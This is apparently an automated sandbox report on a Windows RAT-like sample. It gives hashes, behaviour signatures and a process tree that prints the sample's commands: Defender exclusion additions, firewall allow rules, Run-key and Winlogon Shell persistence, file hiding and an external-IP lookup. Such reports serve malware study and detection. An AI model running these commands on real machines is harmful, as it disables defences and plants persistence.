Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2023, 02:06

General

  • Target

    abe0a71622dc48c4176e92bdf436a83a7cf4b2ee7c7c8222610c7c5d164ee340.exe

  • Size

    1.4MB

  • MD5

    ae9e85d6e11f83b95812c072249bd504

  • SHA1

    e0f4bcef2a2e0501b06e4a45a5f0063ce1e5c644

  • SHA256

    abe0a71622dc48c4176e92bdf436a83a7cf4b2ee7c7c8222610c7c5d164ee340

  • SHA512

    8752e01e26096cf44986119c7a04fba03a11587f48183b1aebca82a9ef2a0bafaca370ab385c8ca0fc29d922745d4854bf9743083d962e7fe5fd4f6fcf19b10b

  • SSDEEP

    24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score
10/10

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\abe0a71622dc48c4176e92bdf436a83a7cf4b2ee7c7c8222610c7c5d164ee340.exe
    "C:\Users\Admin\AppData\Local\Temp\abe0a71622dc48c4176e92bdf436a83a7cf4b2ee7c7c8222610c7c5d164ee340.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2776
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3684
        • C:\Windows\SysWOW64\nslookup.exe
          nslookup myip.opendns.com. resolver1.opendns.com
          4⤵
            PID:2028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic ComputerSystem get Domain
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4908
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5116
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4440
        • C:\Users\Admin\AppData\Local\Temp\7z.exe
          7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
            4⤵
            • Modifies Windows Firewall
            PID:4772
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
            4⤵
            • Modifies Windows Firewall
            PID:944
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4280
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic computersystem where name="BQNDLEKG" set AutomaticManagedPagefile=False
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3088
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2628
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
              5⤵
                PID:4304
            • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
              "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4976
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                5⤵
                  PID:400
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 9
                    6⤵
                    • Runs ping.exe
                    PID:4916
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                    6⤵
                    • Modifies WinLogon for persistence
                    PID:3504
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe"
                  5⤵
                    PID:2456
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 13
                      6⤵
                      • Runs ping.exe
                      PID:3564
                • C:\Windows\SysWOW64\attrib.exe
                  "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
                  4⤵
                  • Views/modifies file attributes
                  PID:760
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
                3⤵
                • Adds Run key to start application
                PID:2776
              • C:\Users\Admin\AppData\Local\Temp\ratt.exe
                "ratt.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2844
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                  4⤵
                    PID:3692
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 6
                      5⤵
                      • Runs ping.exe
                      PID:548
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                      5⤵
                      • Modifies WinLogon for persistence
                      PID:4944
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd" /c ping 127.0.0.1 -n 11 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 11 > nul && "C:\Users\Admin\Music\rot.exe"
                    4⤵
                      PID:3220
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 11
                        5⤵
                        • Runs ping.exe
                        PID:1712
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 11
                        5⤵
                        • Runs ping.exe
                        PID:4768

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

                Filesize

                468.9MB

                MD5

                81abcd73a11ebd136c869448a9298812

                SHA1

                0e0b8590e8f5479bb62808201cc631097a0ed302

                SHA256

                8682a696bb36b7e2ed682551e8b1248bb31cb8cb1a7d8148470eedf067233668

                SHA512

                5d0bf70cc00efec9f2b6de029c26a09370758275e5e6994025641eb9a98c67374e021f4f43a8f5f3ad35a4363a7eecad25174eeaa3718c9b7a175f902fdb96e0

              • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

                Filesize

                348.0MB

                MD5

                ab27de2d8bc1b82edc5a9e431fdd2e8a

                SHA1

                d3445e5c019f9938953a10fd025f7967c008fd84

                SHA256

                7290cd67b0d483d7fa8286b7b0f0ba3187856cf61335670748000339a0fae313

                SHA512

                2dbb669e5395325d60dc868c818152fcb52eaa8f2727864e4fa030fe9e48c446d7d1a9586280eb3d1ee82df608dfb902a9080375c811294c7acbddd5528236de

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                Filesize

                1KB

                MD5

                33b19d75aa77114216dbc23f43b195e3

                SHA1

                36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                SHA256

                b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                SHA512

                676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log

                Filesize

                1KB

                MD5

                9a2d0ce437d2445330f2646472703087

                SHA1

                33c83e484a15f35c2caa3af62d5da6b7713a20ae

                SHA256

                30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c

                SHA512

                a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                11KB

                MD5

                eaa9a8122761318164dc72df162a20dd

                SHA1

                dfa4c6d3385c323b2cbeb5f92d25b864d5fe0a31

                SHA256

                05077fd643f93523de9124b251d5eae7932b60e2e4d9b16f8c333b3dcb742189

                SHA512

                5d3e0f8a15062235fca2833671e374c42a6bfc37f21058855d1080616182cce71056cc7704072cae324d0fc0156ad90034dc4ed42306d68a2d5767d04c1b60b6

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                11KB

                MD5

                d66c84900429bbc66704f7a733909f00

                SHA1

                6176a3c929f0380452327f14a0183e8cc22dcb00

                SHA256

                664bf319faf8cb1cbfb6eb93ac54cf18cd643790deb3a6ee69483b5f9e1e3dd0

                SHA512

                5da91fbcc85ca6e63a66f514125719035f05933f79597d78719818054471dd193f023a21f4c41f68620539b0029108a3d09ad97b19e878dfc20b67fbbe76045f

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                11KB

                MD5

                3f4e7ace963599bc35043df2b34d2299

                SHA1

                bfed340d207a567a1ed328127fb0c4c3d246c245

                SHA256

                ccf83ddc93083c375de751ecd8cf31dba7d56513c1539ba5a70f7e53f3680541

                SHA512

                ff8b0cf07c2a3512db8b3598c86d875ea0556c1be256d7100e3721a9d57d04ce741c5eff1d9f30449ec32ca2a536cd98b48531a3251127c9098ccecf7de5057c

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                11KB

                MD5

                49541b10ddb91559bc96a5a578a9f3c8

                SHA1

                399d20c99761523de92f7a4344f4b335d0f1ecc6

                SHA256

                45ab7f1fac872c39aa2dc93596ec1c2b354c034cecde95bdf64cf0b4ee032e0a

                SHA512

                2dcdcd9a98b01b8aa214d0e49df15e87c4a7644025e609a540abfedef30b52e77ae20f63c7a3448d21f88b62e80c0685372ffbdcb5594161301b366771e6c4ea

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                11KB

                MD5

                be3575b440938f930b7e9a881ea2b019

                SHA1

                df9157d44a18fb91ed0898ffc2583435ee992822

                SHA256

                dd41388f04a688ffd258467fae5fd556b3ca41d2706fe52ab451742d6a331b54

                SHA512

                a9041e0340a352af03bc621a25b021acd46da35d0933c99b9c433f83777f0b4ca551ebc5eeb4f37a5cf2767b3ad6d37874e5029f205826596e5b77e7b2eace8b

              • C:\Users\Admin\AppData\Local\Temp\7z.dll

                Filesize

                328KB

                MD5

                15bbbe562f9be3e5dcbb834e635cc231

                SHA1

                7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

                SHA256

                ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

                SHA512

                769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

              • C:\Users\Admin\AppData\Local\Temp\7z.dll

                Filesize

                328KB

                MD5

                15bbbe562f9be3e5dcbb834e635cc231

                SHA1

                7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

                SHA256

                ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

                SHA512

                769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

              • C:\Users\Admin\AppData\Local\Temp\7z.exe

                Filesize

                71KB

                MD5

                8ba2e41b330ae9356e62eb63514cf82e

                SHA1

                8dc266467a5a0d587ed0181d4344581ef4ff30b2

                SHA256

                ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

                SHA512

                2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

              • C:\Users\Admin\AppData\Local\Temp\7z.exe

                Filesize

                71KB

                MD5

                8ba2e41b330ae9356e62eb63514cf82e

                SHA1

                8dc266467a5a0d587ed0181d4344581ef4ff30b2

                SHA256

                ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

                SHA512

                2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

              • C:\Users\Admin\AppData\Local\Temp\Add.ps1

                Filesize

                1KB

                MD5

                0df43097e0f0acd04d9e17fb43d618b9

                SHA1

                69b3ade12cb228393a93624e65f41604a17c83b6

                SHA256

                c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

                SHA512

                01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h0ss2h05.22s.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\ratt.7z

                Filesize

                693KB

                MD5

                7de6fdf3629c73bf0c29a96fa23ae055

                SHA1

                dcb37f6d43977601c6460b17387a89b9e4c0609a

                SHA256

                069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

                SHA512

                d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

              • C:\Users\Admin\AppData\Local\Temp\ratt.bat

                Filesize

                1KB

                MD5

                7ea1fec84d76294d9256ae3dca7676b2

                SHA1

                1e335451d1cbb6951bc77bf75430f4d983491342

                SHA256

                9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

                SHA512

                ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

              • C:\Users\Admin\AppData\Local\Temp\ratt.exe

                Filesize

                745.1MB

                MD5

                be788bb3680cf3809d9678ee6f7ba321

                SHA1

                499f01d5f654f83e172004dcc03f99abdd251734

                SHA256

                03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

                SHA512

                83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

              • C:\Users\Admin\AppData\Local\Temp\ratt.exe

                Filesize

                264.9MB

                MD5

                3aefb6ce884497a3fbe173e76d4e121a

                SHA1

                2116eb200f101ccbabce78be02400b2acf6972b1

                SHA256

                701c572daac9097f0fdd8ffccd35d48de7a9b1f65e4632aa933c4bd3db42ef7a

                SHA512

                da247857a6821cfc5cfe06d51c328301367c4d728fe5becf1ef816a2ee53c7ee52f3fbec13521a9a2c426a2599ac9ebaded4f0e2ab00f2e6e0239ea5081fb86f

              • memory/548-110-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

              • memory/548-106-0x0000000010000000-0x00000000100E2000-memory.dmp

                Filesize

                904KB

              • memory/548-102-0x0000000000400000-0x0000000000432000-memory.dmp

                Filesize

                200KB

              • memory/764-30-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

                Filesize

                120KB

              • memory/764-16-0x0000000005040000-0x0000000005668000-memory.dmp

                Filesize

                6.2MB

              • memory/764-14-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/764-13-0x00000000028A0000-0x00000000028D6000-memory.dmp

                Filesize

                216KB

              • memory/764-15-0x0000000002940000-0x0000000002950000-memory.dmp

                Filesize

                64KB

              • memory/764-17-0x0000000004ED0000-0x0000000004EF2000-memory.dmp

                Filesize

                136KB

              • memory/764-35-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/764-32-0x0000000002940000-0x0000000002950000-memory.dmp

                Filesize

                64KB

              • memory/764-31-0x0000000005F90000-0x0000000005FDC000-memory.dmp

                Filesize

                304KB

              • memory/764-25-0x00000000058C0000-0x0000000005C14000-memory.dmp

                Filesize

                3.3MB

              • memory/764-24-0x0000000005850000-0x00000000058B6000-memory.dmp

                Filesize

                408KB

              • memory/764-18-0x00000000057E0000-0x0000000005846000-memory.dmp

                Filesize

                408KB

              • memory/2820-38-0x0000000002D80000-0x0000000002D90000-memory.dmp

                Filesize

                64KB

              • memory/2820-52-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/2820-37-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/2820-44-0x0000000005FB0000-0x0000000006304000-memory.dmp

                Filesize

                3.3MB

              • memory/2820-50-0x0000000002D80000-0x0000000002D90000-memory.dmp

                Filesize

                64KB

              • memory/2896-148-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/2896-131-0x0000000006300000-0x0000000006332000-memory.dmp

                Filesize

                200KB

              • memory/2896-156-0x0000000007380000-0x000000000739A000-memory.dmp

                Filesize

                104KB

              • memory/2896-155-0x00000000072A0000-0x00000000072B4000-memory.dmp

                Filesize

                80KB

              • memory/2896-154-0x0000000004A50000-0x0000000004A5E000-memory.dmp

                Filesize

                56KB

              • memory/2896-152-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/2896-151-0x0000000007240000-0x0000000007251000-memory.dmp

                Filesize

                68KB

              • memory/2896-114-0x0000000074930000-0x00000000750E0000-memory.dmp

                Filesize

                7.7MB

              • memory/2896-115-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/2896-116-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/2896-126-0x00000000056D0000-0x0000000005A24000-memory.dmp

                Filesize

                3.3MB

              • memory/2896-150-0x00000000072E0000-0x0000000007376000-memory.dmp

                Filesize

                600KB

              • memory/2896-128-0x00000000062B0000-0x00000000062FC000-memory.dmp

                Filesize

                304KB

              • memory/2896-159-0x0000000008300000-0x00000000088A4000-memory.dmp

                Filesize

                5.6MB

              • memory/2896-130-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/2896-157-0x00000000070E0000-0x00000000070E8000-memory.dmp

                Filesize

                32KB

              • memory/2896-132-0x0000000070750000-0x000000007079C000-memory.dmp

                Filesize

                304KB

              • memory/2896-142-0x0000000006290000-0x00000000062AE000-memory.dmp

                Filesize

                120KB

              • memory/2896-143-0x0000000006F60000-0x0000000007003000-memory.dmp

                Filesize

                652KB

              • memory/2896-144-0x00000000076D0000-0x0000000007D4A000-memory.dmp

                Filesize

                6.5MB

              • memory/2896-145-0x0000000007070000-0x000000000708A000-memory.dmp

                Filesize

                104KB

              • memory/2896-146-0x0000000074930000-0x00000000750E0000-memory.dmp

                Filesize

                7.7MB

              • memory/2896-147-0x00000000070B0000-0x00000000070BA000-memory.dmp

                Filesize

                40KB

              • memory/2896-158-0x00000000073F0000-0x0000000007412000-memory.dmp

                Filesize

                136KB

              • memory/2896-149-0x0000000000A50000-0x0000000000A60000-memory.dmp

                Filesize

                64KB

              • memory/4440-99-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4440-83-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4440-85-0x0000000000FF0000-0x0000000001000000-memory.dmp

                Filesize

                64KB

              • memory/4440-84-0x0000000000FF0000-0x0000000001000000-memory.dmp

                Filesize

                64KB

              • memory/4440-95-0x0000000005EA0000-0x00000000061F4000-memory.dmp

                Filesize

                3.3MB

              • memory/4440-97-0x0000000000FF0000-0x0000000001000000-memory.dmp

                Filesize

                64KB

              • memory/4908-68-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4908-64-0x0000000005630000-0x0000000005984000-memory.dmp

                Filesize

                3.3MB

              • memory/4908-54-0x0000000000CC0000-0x0000000000CD0000-memory.dmp

                Filesize

                64KB

              • memory/4908-53-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4908-66-0x0000000000CC0000-0x0000000000CD0000-memory.dmp

                Filesize

                64KB

              • memory/4976-165-0x0000000004B30000-0x0000000004BCC000-memory.dmp

                Filesize

                624KB

              • memory/4976-164-0x00000000007F0000-0x00000000009A6000-memory.dmp

                Filesize

                1.7MB

              • memory/4976-166-0x0000000004C70000-0x0000000004D02000-memory.dmp

                Filesize

                584KB

              • memory/4976-167-0x0000000004C60000-0x0000000004C70000-memory.dmp

                Filesize

                64KB

              • memory/4976-169-0x0000000004AC0000-0x0000000004B06000-memory.dmp

                Filesize

                280KB

              • memory/4976-163-0x0000000074930000-0x00000000750E0000-memory.dmp

                Filesize

                7.7MB

              • memory/5116-69-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/5116-82-0x0000000074A00000-0x00000000751B0000-memory.dmp

                Filesize

                7.7MB

              • memory/5116-70-0x0000000002B10000-0x0000000002B20000-memory.dmp

                Filesize

                64KB